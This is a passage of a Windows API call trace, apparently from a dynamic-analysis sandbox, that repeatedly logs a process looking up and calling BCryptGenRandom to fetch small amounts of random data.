cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0252.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02382, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x3a02382) returned 0x0 [0252.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0252.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0252.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0252.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0252.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a023b3, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a023b3) returned 0x0 [0252.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0252.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0252.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a023cb, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a023cb) returned 0x0 [0252.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0252.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a023dc, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a023dc) returned 0x0 [0252.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") 